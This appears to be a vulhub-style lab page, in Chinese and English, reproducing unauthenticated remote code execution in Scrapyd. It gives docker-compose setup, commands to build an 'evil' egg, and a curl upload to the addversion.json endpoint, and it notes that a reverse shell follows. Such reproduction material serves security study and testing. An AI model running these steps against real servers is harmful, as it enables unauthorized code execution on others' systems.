Path scrapy/scrapyd-unacc

Scrapyd Unauthenticated Remote Code Execution

• Scrapyd是用于部署和運行Scrapy spiders的應用程序。它使用戶可以使用JSON API部署（上傳）項目并控制其spiders程序。
  References: https://www.leavesongs.com/PENETRATION/attack-scrapy.html

Start server 啟動服務器

執行以下命令以啟動scrapyd服務器：

docker-compose up -d

部署scrapyd之后，服務器正在監聽 http://your-ip:6800

Reproduce 復制

建立一個 evil egg archive:

pip install scrapy scrapyd-client
scrapy startproject evil
cd evil
# edit evil/__init__.py, add evil code
scrapyd-deploy --build-egg=evil.egg

上傳 evil egg 到scrapyd服務器:

curl http://your-ip:6800/addversion.json -F project=evil -F version=r01 -F egg=@evil.egg

可以反彈shell